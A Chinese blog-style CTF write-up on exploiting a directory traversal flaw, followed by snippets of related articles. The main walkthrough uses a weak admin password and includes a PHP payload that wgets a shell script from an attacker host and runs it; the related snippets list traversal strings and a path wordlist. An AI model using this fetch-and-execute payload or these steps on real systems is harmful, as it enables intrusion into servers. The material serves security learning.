CTF-目录遍历漏洞

最新推荐文章于 2024-05-28 15:44:18 发布
原创 最新推荐文章于 2024-05-28 15:44:18 发布 · 868 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全 #系统安全 #web安全 #安全

本文介绍了如何通过发现并利用网站的目录遍历漏洞,逐步进行权限提升,最终实现Webshell上传和远程命令执行。涉及步骤包括弱口令攻击、漏洞确认、内容获取、数据库操作与脚本部署、简易HTTP服务器搭建和权限获取的过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

原理:当客户端访问到一个目录时,Apache服务器将会默认寻找一个index list中的文件,若文 件不存在,则会列出当前目录下所有文件或返回403状态码,而列出目录下所有文件的行为称为目录遍历。

1.扫描,看到个很admin有关的页面

2.老规矩试一下弱口令admin,进入成功,是个数据库后台管理页面 

3.使用AWVS扫描网站,有个目录遍历漏洞,根据漏洞详情在地址栏输入地址得到passwd的内容,说明这个漏洞可行

 3.这样就可以上传webshell,用目录遍历的方式启动。用msfvenom生成一个基于Python的webshell

4.在数据库后台新建一个数据库,创建一个表,并设置元组为1个

 

5.设置元组类型为txt,值为<?php system("cd /tmp;wget http://192.168.203.130:8000/shell.py;chmod 777 shell.py;python shell.py");?>,当访问数据库的时候系统会自动读取改值,并执行命令,相当于一个脚本

6.利用python建立简单http服务器

 

 7.复制路径,访问并取得权限

 

 

 

 

 

 

 

 

 

Aiohttp 目录遍历漏洞(CVE-2024-23334)
iSee857的博客
09-02 1102
aiohttp 是一个用于 asyncio 和 Python 的异步 HTTP 客户端/服务器框架。使用aiohttp作为Web服务器并配置静态路由时,需要指定静态文件的根路径。使用aiohttp实现的Web服务在 配置aiohttp中的静态资源解析时使用了不安全的参数follow_symlinks,代码如routes.static("/static", static_dir, follow_symlinks=True) 成功利用该漏洞可读取服务器上任意文件。官方已在3.9.2及以上版本中修复次漏洞
CTF学习记录009-简单的目录遍历
wupeng_ccab的博客
09-17 842
再点击 控制选项卡,点击 会话停止 按钮 启动目录遍历目录层级多少和需要获取的文件名称多少决定了攻击时间的长短。对于本题来说,经简单点击,发现只有二层目录,递归搜寻子目录设置为2层,其余设定可使用默认值。点击网站地图,展开所有目录,发现在 1/3/ 目录下有flag,查看响应报文,拿到flag。复杂的目录遍历可以使用 相关工具-----内容搜索。找到flag文件,查看响应报文,拿到flag。简单的目录遍历,用相关工具---参考源搜索。题目-简单的目录遍历,寻找flag。
CTFHub----目录遍历
unexpectedthing的博客
08-03 1522
信息收集目录穿越目录遍历概念原因漏洞利用常见的绕过方式任意文件下载 目录穿越 点开进去,发现是许多目录,就是目录遍历的考点 一个一个的试,发现在/4/2,有flag.txt,点开得到flag 目录遍历 概念 目录遍历是由于web服务器或者web应用程序对用户输入的文件名称 安全性验证不足而导致的一种安全漏洞,使得攻击者通过利用一些 特殊字符就可以绕过服务器的安全限制,访问任意的文件(可以是web目录以外的文件),甚至执行系统命令。 原因 目录浏览漏洞是由于网站存在配置缺陷,导致网站目录
小白学习CTF第十天-目录遍历漏洞
bbhh1139的博客
04-25 868
目录遍历漏洞简介 信息探测 信息探测与之前的操作一样,可以看到了开放了http80端口可以,尝试使用更加高级的方法进行扫描,其余的端口也可以尝试,看看是否有关键信息。 使用了nikto 以及dirb进行探测。我们尝试打开一些敏感信息。 之后打开,我们可以看到一个登陆输入密码的地方,这里可能存在漏洞,可以进行攻击。 漏洞扫描 使用owasp-zap 从扫描结果中可以看到,的确存...
CTF训练 web安全目录遍历
qq_43613772的博客
06-13 4905
目录遍历漏洞介绍 路径遍历攻击(也称为目录遍历)旨在访问存储在Web根文件夹之外的文件和目录。通过操纵带有“点-斜线(…)”序列及其变化的文件或使用绝对文件路径来引用文件的变量,可以访问存储在文件系统上的任意文件和目录,包括应用程序源代码、配置和关键系统文件。 需要注意的是,系统操作访问控制(如在微软Windows操作系统上锁定或使用文件)限制了对文件的访问权限。 这种攻击也称为“点-点斜线”、“...
CTF-------目录遍历
qq_45616570的博客
06-22 3566
title: CTFHUB------信息泄露 date: 2021-06-20 10:48:44 description: 前言:零度安全搭建博客后的第N篇文章 top: categories: CTFHUB刷题 tags: 网络安全 CTFHUB CTFHUB------信息泄露 文件泄露 1.目录遍历 来源:http://challenge-00fd49cf10fde723.sandbox.ctfhub.com:10800 目录遍历: 1.可以采用python脚本去跑查看哪个文件夹中含有f.
CTFHub技能树web(持续更新)--web信息泄露--目录遍历
jiuyongpinyin的博客
07-28 592
目录遍历 打开网页,点击寻找flag,发现4个目录,我们先随便点击一个,看看有什么变化: 我们随便点击了一个1,发现url后面对了个1,并且又出现了四个文件目录,再试试: 我们有点击进去了一个,发现url后面又多了一个1,经过尝试,最终在这里找到了flag: 目录遍历常见的是使用…/来遍历目录,直到根目录下,或者常用的敏感目录下 注:萌新第一次写write up,不足之处还请见谅,不对之处欢迎批评指正。 ...
CTFHub-目录遍历
m0_69003772的博客
04-23 2067
CTFHub目录遍历解题过程
CTFCTFHub------web-信息泄露-目录遍历/PHPINFO
从零开始的网安生活
07-23 692
文章目录目录遍历PHPINFO 目录遍历 点击链接进入,依次在目录下寻找:1/1 1/2……最后在3/4下发现flag文件,点击即可获得flag PHPINFO 1.点击链接进入,快捷键 ctrl+f 搜索 flag 即可获得
[CTFHub]目录遍历web>信息泄露)
ZXW_NUDT的博客
04-30 484
思路一: 这个东西一个个找就可以找到flag 思路二: 用python脚本进行寻找 import requests url = "http://challenge-88fe15103038d8b0.sandbox.ctfhub.com:10080/flag_in_here" for i in range(5): for j in range(5): url_final = url + "/" + str(i) + "/" + str(j) r = reques...
CTF有效的目录扫描工具
12-13
CTF有效的目录扫描工具
御剑 扫描神器含CTF专用目录字典
10-06
御剑 扫描神器含CTF专用目录字典
目录穿越/遍历漏洞及对其防御方法的绕过
2301_77004573的博客
04-30 8056
目录穿越(目录遍历)是一个Web安全漏洞,攻击者可以利用该漏洞读取运行应用程序的服务器上的任意文件。这可能包括应用程序代码和数据,后端系统的登录信息以及敏感的操作系统文件。目录穿越不仅可以访问服务器中的任何目录,还可以访问服务器中任何文件的内容。例如,攻击者通过浏览器访问…/…/…/…/…/…/…/…/…/…/…/…/…/…/etc/passwd(此处较多…/),就可以读取Linux服务器根目录下的etc目录下的passwd文件的内容。
CTFHUB技能树——信息泄露——目录遍历(新手必看)
qq_64948897的博客
07-24 936
ctfhub技能树,萌新必看,信息泄露目录遍历
目录遍历漏洞
夜行者的博客
02-18 6753
目录遍历漏洞是由于web中间件目录访问相关的配置错误造成的,该漏洞会泄露web应用程序的敏感路径、敏感的文件信息、网站的编辑器路径或测试接口、系统敏感目录(配合../等目录跳转符)等信息,从而给网站的安全带来威胁 检测方法: 主要有两种方式:手工测试和使用自动化扫描器。 1)手工测试:通过直接访问网站的各种目录(不加文件名和参数),如果显示了该目录下的文件和目录信息,证明存在该漏洞。 2)自动化扫描:一般使用大型的web漏洞扫描工具来进行自动测试,如awvs、w3af、APPscan、dirBust
CTF赛题分析之 Flask 目录穿越
baimao__Ch的博客
04-25 1600
最近身边有萌新想打ctf,我作为一个曾经接触过一点点ctf的业余菜鸡,就索性做了一道Web题。这篇文章主要是面向想开始打ctf的萌新,所以很多地方可能都比较简单。如有错误之处,欢迎各位指正。Flask库是一个非常小型的Python Web开发框架。它有两个主要依赖:路由、调试和 Web 服务器网关接口(Web Server Gateway Interface,WSGI)子系统由 Werkzeug(werkzeug.pocoo.org/)提供;模板系统由Jinja2(jinja.pocoo.org/)提供。
CTF| 格式化字符串漏洞
最新发布
2401_84466227的博客
05-28 1340
printf("格式化字符串",参数...)该printf函数的第一个参数是由格式化说明符与字符串组成,用来规定参数用什么格式输出内容。格式化说明符:%d - 十进制 - 输出十进制整数%s - 字符串 - 从内存中读取字符串%x - 十六进制 - 输出十六进制数%c - 字符 - 输出字符%p - 指针 - 指针地址%n - 到目前为止所写的字符数例如:return 0;调用以后会显示:特别要注意的是%n这个格式化字符串,它的功能是将%n。
ctf 目录遍历 字典
05-14
CTF比赛中可能会出现目录遍历漏洞,可以使用字典来进行爆破,以下是一些常用的字典: 1. 相对路径字典:../、../../、../../../ 等 2. 绝对路径字典:/、//、///、/etc/、/root/ 等 3. 文件名字典:index.php、config.php、passwd、shadow 等 4. 目录名字典:admin、etc、var、usr 等 5. 扩展名字典:.jpg、.txt、.php、.bak 等 6. 特殊字符字典:%00、%2e%2e%2f、%2f%2e%2e%2f、%252e%252e%252f 等 7. 自定义字典:根据实际情况自行添加可能存在的路径、文件、目录名等。 以上字典可根据实际情况进行组合使用。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Reaches_r

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值